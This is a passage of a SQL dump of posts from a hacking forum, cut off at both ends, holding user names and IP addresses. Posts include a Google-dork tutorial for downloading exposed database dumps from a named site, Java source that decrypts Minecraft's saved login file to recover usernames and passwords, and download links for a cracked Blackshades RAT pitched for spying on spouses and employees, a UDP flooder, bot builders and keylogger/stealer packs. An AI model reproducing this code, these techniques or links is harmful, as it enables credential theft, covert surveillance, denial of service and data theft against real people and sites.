VirtualHacker on HF.[/b][/color]', '119.154.22.176', '2006587056', '1', '0', '54', '1345185233', '1', '2c72eef9a12e6b272fe49749e36e335e', '0', '1345185233'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('357', '140', '0', '19', '[Junk]???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '54', 'Sin Cara', '1345186318', '[align=center][color=#808000][u][size=medium][b]-:Title: [/b][/size][/u][/color][/align] [align=center]Earn 40$-60$ per day by doing a very simple work.[/align] [align=center][color=#808000][size=medium][u][b]-:Description:-[/b][/u][/size][/color][/align] [align=center]This guide not contains: [b]Selling/Buying Filling Surveys PPD PTC[/b][/align] [align=center][color=#808000][size=medium][u][b]-:Pages:-[/b][/u][/size][/color][/align] [align=center]14[/align] [align=center][color=#808000][size=medium][u][b]-:Author:-[/b][/u][/size][/color][/align] [align=center]Realhack3r(SinCara)[/align] [align=center][color=#808000][size=medium][u][b]-:Copies Available:-[/b][/u][/size][/color][/align] [align=center]Unlimited [/align] [align=center][color=#808000][size=medium][u][b]-:Reseller Rights:-[/b][/u][/size][/color][/align] [align=center]No..![/align] [align=center][color=#808000][size=medium][u][b]-:Price:-[/b][/u][/size][/color][/align] [align=center]10$[/align] [align=center][color=#808000][size=medium][u][b]-:Payment Method:-[/b][/u][/size][/color][/align] [align=center]Liberty Reserve[/align] [align=center][color=#808000][size=medium][u][b]-:Vouches:-[/b][/u][/size][/color][/align] Currently none available. [align=center][color=#DAA520][b]Note :[/b][/color] No Vouch Copy except [color=#FF0000]t3h jok3r[/color][/align]', '119.154.22.176', '2006587056', '1', '0', '1', '1345419572', '1', '55e897c5238a519982bd50fed160750e', '0', '1345419572'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('443', '140', '357', '19', 'RE: ???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '1', 't3h jok3r', '1345419603', 'Firstly, I fixed my username from t3j joker to t3h jok3r. Secondly, I\'ll take a vouch copy and off site vouches are not allowed.', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', '7f3ff935ca86015124fafe72debcdb48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('444', '147', '439', '42', 'RE: [Hacker news] BOTNET -The hacker news magazine', '0', '61', 'NXK', '1345420482', '[quote=\'spacefish36\' pid=\'439\' dateline=\'1345417799\'] If their next conference is held in USA, then I would definitely go to the conference other wise not. What about you NXK? [/quote] I\'m canadian but id love to take a trip and check it out.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '1d7eb46f6b25ca415169a19331fd6788', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('445', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '1', 't3h jok3r', '1345421278', 'True, well according to me it\'s all good news. I might be sound rude but I\'m not being rude, it\'s just he never was active from day one. Even if I\'m away, Apathy was there and helped me out no matter what. He is a true friend and I\'m happy to hire someone new because they will actually prove it to LH that they are active and will do their best to make LH more popular. I hope I find the right person, I got a suggestion from someone and gave them a task to help me with and they doing pretty good.', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', 'd3d302108693e4161487312bca45eddf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('446', '134', '341', '47', 'RE: Win $10 for referring people', '0', '1', 't3h jok3r', '1345421400', 'Good Luck! Even if you are a admin, you can participate in this contest.', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', '1ae624b37cbf42eba4eb50a0986db972', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('447', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '1', 't3h jok3r', '1345421614', 'Lol I had the virus scan part on bold to let you know that you need to have a virus scan. Why can\'t it have a virus scan?', '41.174.60.45', '699284525', '1', '0', '1', '1345421626', '1', '16ace483117f091ca8b06a2ebe47d695', '0', '1345421626'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('448', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '4', 'Triple H', '1345421897', 'Is there a download link for the monkeys deface builder?', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', '5523f6dcf77855ec734e689f53205fd1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('449', '156', '0', '13', '[tut]View/Download SQL DB', '0', '4', 'Triple H', '1345422231', 'Article Author: DnSsTuf Dork For Search : Code: inurl:/\'\'bigdump.php\'\' intitle:BigDump ver. 0.29b How To Use It : 1st You need To Search This Dorks on Google Or Other Search Engine.. Now We Got This Site For Example... Code: http://bitterrivals.org/dump/bigdump.php Now There iz Showing An Database File.. Code: brprof_phpbb3_users2.sql Now To Get DataBase Ov Website You Need To Delete This From Link And Add The Database Name there... Like This.. Code: http://bitterrivals.org/dump/bigdump.php Code: http://bitterrivals.org/dump/brprof_phpbb3_users2.sql', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', 'c08d7a31634755a1e472047ef723ee3c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('358', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '1', 't3h jok3r', '1345209613', 'No problem. Good Luck bro, BTW I have a small job for you. I will PM you about it later on today.', '41.174.23.65', '699275073', '1', '0', '0', '0', '1', '1371cf0383efa5f49e31a9312d2a88e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('359', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345217304', 'Thanks :) .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '27e4f6134c4f452420aa079c19f8a3d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('360', '31', '86', '7', 'RE: How long are you online daily?', '0', '54', 'Sin Cara', '1345218103', 'hmmmmmmmmm...... i online about 4-6 hours daily :)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '39b07a1a146c6014cda8ae91c4006910', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('361', '140', '357', '19', 'RE: ???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '2', 'Apathy', '1345220131', 'Could I get the vouch copy? Me and the joker are BFF.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'a0e97c200c0c6b4e6d62cc81a3b84c06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('362', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '2', 'Apathy', '1345220233', 'Nice tutorial thanks.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'e77a85bad076036b349ca9217d5e47d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('363', '136', '353', '53', 'RE: [Java] Minecraft Lastlogin Decrypter [Source]', '0', '2', 'Apathy', '1345220274', 'So how would I use this?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '1c6d782186badb0cc807be1e6eb320cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('364', '136', '353', '53', 'RE: [Java] Minecraft Lastlogin Decrypter [Source]', '0', '67', 'HoverCatz', '1345220699', 'Hey. There was something wrong with the code, so i fixed it :) Here is a download to test it directly: [url=https://dl.dropbox.com/u/33062220/LastLogin%20decrypt.rar]Click Here[/url] [code] import javax.crypto.*; import java.io.BufferedReader; import java.io.DataInputStream; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStreamReader; import java.util.*; import java.util.logging.Logger; import javax.crypto.spec.*; public class test { public static void main(String[] args) { new test(); } public String user = \"\"; public String pass = \"\"; public test() { readUsername(); System.out.println(\"Username: \" + user); System.out.println(\"Password \" + pass); } private void readUsername() { try { File lastLogin = new File(getAppData() + \"\\\\.minecraft\\\\lastlogin\"); Cipher cipher = getCipher(2, \"passwordfile\"); DataInputStream dis; if (cipher != null) dis = new DataInputStream(new CipherInputStream( new FileInputStream(lastLogin), cipher)); else { dis = new DataInputStream(new FileInputStream(lastLogin)); } user = dis.readUTF(); pass = dis.readUTF(); dis.close(); } catch (Exception e) { e.printStackTrace(); } } private Cipher getCipher(int mode, String password) throws Exception { Random random = new Random(43287234L); byte[] salt = new byte[8]; random.nextBytes(salt); PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5); SecretKey pbeKey = SecretKeyFactory.getInstance(\"PBEWithMD5AndDES\") .generateSecret(new PBEKeySpec(password.toCharArray())); Cipher cipher = Cipher.getInstance(\"PBEWithMD5AndDES\"); cipher.init(mode, pbeKey, pbeParamSpec); return cipher; } private static File getAppData() { ProcessBuilder builder = new ProcessBuilder(new String[]{\"cmd\", \"/C echo %APPDATA%\"}); BufferedReader br = null; try { Process start = builder.start(); br = new BufferedReader(new InputStreamReader(start.getInputStream())); String path = br.readLine(); // TODO HACK do not know why but I get an extra \'\"\' at the end if(path.endsWith(\"\\\"\")){ path = path.substring(0, path.length()-1); } return new File(path.trim()); } catch (IOException ex) { System.out.println(\"Cannot get Application Data Folder\"); } finally { if(br != null){ try { br.close(); } catch (IOException ex) { System.out.println(\"Error: \" + ex.getMessage()); } } } return null; } } [/code]', '85.165.36.95', '1436886111', '1', '0', '67', '1345221060', '1', '0333d857efbf9812bf8977da92b51533', '0', '1345221060'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('365', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '67', 'HoverCatz', '1345222852', 'Nice, this rocks! :D .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '4f533ac2ee1cb8c1dcb2bc93b2d7b037', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('366', '121', '302', '21', 'RE: kurosaki\'s DOS Tool', '0', '67', 'HoverCatz', '1345223098', 'Error :| [code]Fatal error: Call to undefined function curl_init() in C:\\xampp\\htdocs\\mydos.php(2) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(3) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code on line 1[/code]', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'e84c180cc0cd7eb0e2b8300f20c92e75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('367', '122', '304', '24', 'RE: [tut] Increase your virtual RAM', '0', '67', 'HoverCatz', '1345223197', 'My maximum is 8GB. What should i use?', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'fba77f82b4364cfd0ac5d21253c5294f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('368', '141', '0', '9', '$30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '19', '60', 'Linux', '1345224075', '[b][color=#1E90FF][size=xx-large][size=x-large][align=center][url=http://goo.gl/BjBcb]Topline[/url] [/align][/size][/size][/color][/b] [color=#32CD32] Just though I’d tell you about [url=http://goo.gl/BjBcb]Topline[/url]. It’s a simple add-on that you download and it changes all ads on the sites you visit, into their own ads. They therefore pay you. For every 1000 ads you see, you get $0.75. This means you are getting money for free as you browse!! [color=#00BFFF][size=x-large][align=center]How to make more money?(Autopilot)[/align][/size][/color] You can open multiple tabs and simply refresh the page repeatedly to earn more points. You can also download a auto-refresher. This means you can auto-refresh all the tabs (or just the ones you select to be refreshed) on your web browser, whilst you\'re asleep, away or simply browsing HF. The link for the auto-refresher will be at the bottom of this thread![/color] Register here: http://goo.gl/BjBcb Chrome Auto refresher: http://www.chromeextensions.org/utilities/auto-reload/ Firefox Auto refresher: https://addons.mozilla.org/en-US/firefox/addon/reloadevery/', '117.217.209.184', '1977209272', '0', '0', '0', '0', '1', '84c6bfc8a7c8b1d5d6cc73b9a01e3efd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('369', '142', '0', '30', 'Blackshades RAT 5.0 Cracked', '19', '60', 'Linux', '1345224837', '[size=x-large][b][align=center]Blackshades RAT 5.0 Cracked.[/align][/b][/size] [align=center][img]http://i.minus.com/i1HilLgDXrByp.PNG[/img][/align] Blackshades Remote Controller is a Remote Administration Application which allows a user to control several clients from around the world. Need to help out a customer who is having trouble setting up a piece of software? Have you ever questioned what your spouse, kids or employees have been doing on the computer? Is your child misusing the internet facility and taking secret chat with the stranger? Are your employees mailing your business data to your competitors? Blackshades Remote Controller will enable you to control the client\'s PC as if you were sitting right in front of it, with support for mouse and keyboard input! You can also chat with the client while you do so. Got a Network to manage? With Blackshades Remote Controller you can connect to unlimited systems, and administer them collectively or individually. You can transfer files between systems, view all the screens of the systems simultaneously and perform maintenance actions. Send a message to all of them with one click, chat with the systems, run commands via the remote command prompt...there\'s a huge range of functions suited for network management. Blackshades Remote Controller also provides as an efficient way of turning your machine into a surveillance/spy-device or to spy on a specific system. If you want to monitor all keystrokes on your computer while you are away, or want to make sure your child is being safe while using the computer, the built in tools such as the keystroke capturer, screen viewer and process manager will aid you to do so. This tool has no dependencies (.NET Framework, java, etc) and works extremely well and stable. Blackshades Remote Controller will let you remotely control your machines, while giving you complete peace of mind. Using this tool will allow you to do anything between controlling software and hardware. Customers also get free support, and ability to instantly communicate with other members. [size=large][b]With Blackshades Remote Controller you can:[/b][/size] - Control several computers at once, performing tasks ranging from viewing their screens to uploading/downloading files from them - Perform maintenance on a Network - Help a client out by using the screen capture feature, even if they are on the other side of the world - Monitor a specific PC, recording the keystrokes and remotely managing the files - Access your computer that you have at home if you are on holiday - Monitor the computers of students and their activity while teaching a computing lesson - Chat with clients that you are connected to [size=small][b]Disclaimer:[/b] - This is for study purpose only. - I\'m not responsible for anything you do with this RAT.[/size] [size=x-large][b]Download Link:[/b][/size] https://dl.dropbox.com/u/53499237/BlackShades%205.0.rar If you need any help or assistance PM me.', '117.217.209.184', '1977209272', '0', '0', '0', '0', '1', '7d450b1cc3d5086d716a29ffe3be81cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('370', '142', '369', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '67', 'HoverCatz', '1345225945', 'Virustotal? .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'bed4797442b88b95f1162508684895b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('371', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '61', 'NXK', '1345231335', 'Definatly use that theme, Looks amazing.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '322b12de1d8622195918f36652f79467', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('372', '143', '0', '21', 'Tiny flood', '0', '61', 'NXK', '1345231616', 'Tiny flood is just a simple UDP flooder I made with c# *features [Theres lots... kidding] -Ip/port select, that\'s it. Simpler is better IMO. [img]http://picsend.net/images/151071tinyfloo.png[/img] Download: http://www.mediafire.com/?tp76g3wc8d7kvfk https://www.virustotal.com/file/7368d39fa14f141524572742a9a8298dee4e96eaf9b1c6ff8f7f236acc06de28/analysis/1341255034/', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '94b3138157b1b5a401b953cd7dc09157', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('373', '144', '0', '21', 'HTTP bot pack [free direct link]', '0', '61', 'NXK', '1345231914', 'Heres a big pack of http bots :) I don\'t really wana scan every single builder so Just run the builders in sandboxie they will all work. [img]http://img805.imageshack.us/img805/8969/bots.png[/img] http://www.mediafire.com/?4fbv22j286y98we', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '13e104d8992bc74a7b52982f7ff1c2b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('374', '145', '0', '30', 'Stealers/Keyloggers', '0', '61', 'NXK', '1345232233', 'Pack of keyloggers/Stealers Iv had for a while. Includes -Elite Recovery -Nova logger -POE stealer [really good] -Greive logger -crime 24 stealer Most of them have http panels [img]http://i.imgur.com/JFfZu.png[/img] [Download] http://www.mediafire.com/?qbes44s6435jo34 Password is \"l33thacker\" without the \"\" Everything works in sandboxie so if you don\'t trust just go ahead and use that.', '99.253.65.17', '1677541649', '0', '0', '61', '1349026505', '1', '64b511422a231b0530c305d39919d34b', '0', '1349026505'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('375', '146', '0', '29', 'se7en sins PREMIUM SECTION', '0', '61', 'NXK', '1345232533', 'Heres the whole se7en sins premium section :) Theres ALOT of very good tutorials on here ranging from pretty much everything.. Hacking,Free stuff,Porn,Tutorials... tons. http://www.mediafire.com/?2dh0je1h7cn5473 password is \"l33thacker\" with no \"\"', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'fc7a8b8a8aa4b534851b409e601f4af5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('376', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '5', 'Timmy', '1345235538', 'The banner needs to be changed with the new theme though', '173.179.204.156', '-1380725604', '1', '0', '0', '0', '1', 'b2ba8ea131b64e44f3df87e757c81c48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('377', '142', '370', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '1', 't3h jok3r', '1345239830', '[quote=\'HoverCatz\' pid=\'370\' dateline=\'1345225945\'] Virustotal? . [/quote] It\'s not going to be safe because it\'s a RAT and plus it\'s cracked. So there\'s no use of a scan, however if you have sandbox then open the control panel and check the hidden programs/files in the RAT', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', '5dcfa44d3b44642ef7bd7aa2f8aa7660', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('378', '142', '377', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '67', 'HoverCatz', '1345240316', '[quote=\'t3h jok3r\' pid=\'377\' dateline=\'1345239830\'] [quote=\'HoverCatz\' pid=\'370\' dateline=\'1345225945\'] Virustotal? . [/quote] It\'s not going to be safe because it\'s a RAT and plus it\'s cracked. So there\'s no use of a scan, however if you have sandbox then open the control panel and check the hidden programs/files in the RAT [/quote] Ah youre right', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '7f6cdab376b1df04a3e51d96c1c76e9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('379', '145', '374', '30', 'RE: Stealers/Keyloggers', '0', '1', 't3h jok3r', '1345240470', 'Damn, I believe your computer must be slow as hell. Anyways, nice programs. I always wanted the grieve private crypter.', '41.174.8.52', '699271220', '1', '0', '1', '1345240480', '1', 'f2f2e1ad48d78e9208d4e875c5bc770d', '0', '1345240480'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('380', '146', '375', '29', 'RE: se7en sins PREMIUM SECTION', '0', '2', 'Apathy', '1345243405', 'I this the old one or did you rip it?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '15b62a5dbeef5fb9f508fcc8caad1857', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('381', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '4', 'Triple H', '1345243664', 'Thanks for the link. Your ebook was worth the survey.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'c0c9f453e7cfea5bc02810a7f6e5dc0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('382', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '4', 'Triple H', '1345243719', 'I\'m going to give this a try when I go back to USA because there I have a faster internet connection so I can earn more easily. Thanks', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'f70224ab5f0166aa2cbcf4a07bda2e07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('383', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '72', 'Quietus2', '1345244215', 'Can u PM me? I want to download them.', '78.58.52.147', '1312437395', '0', '0', '0', '0', '1', '87ef2c857df7effc040242bae4080ead', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('384', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '1', 't3h jok3r', '1345244297', 'Lol I love it when you said it\'s a art. Honestly, I agree with you plus it\'s addicting.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'ce29d34cefa7b33a57ffaf3c48461654', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('385', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '1', 't3h jok3r', '1345244424', 'Wow that\'s some unique trick. By the way, where\'s the download to HORNY monkeys deface builder? Just wondering.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'a3b9210655acf467f3a36c349c898d03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('386', '127', '316', '46', 'RE: Will make you a phisher website with 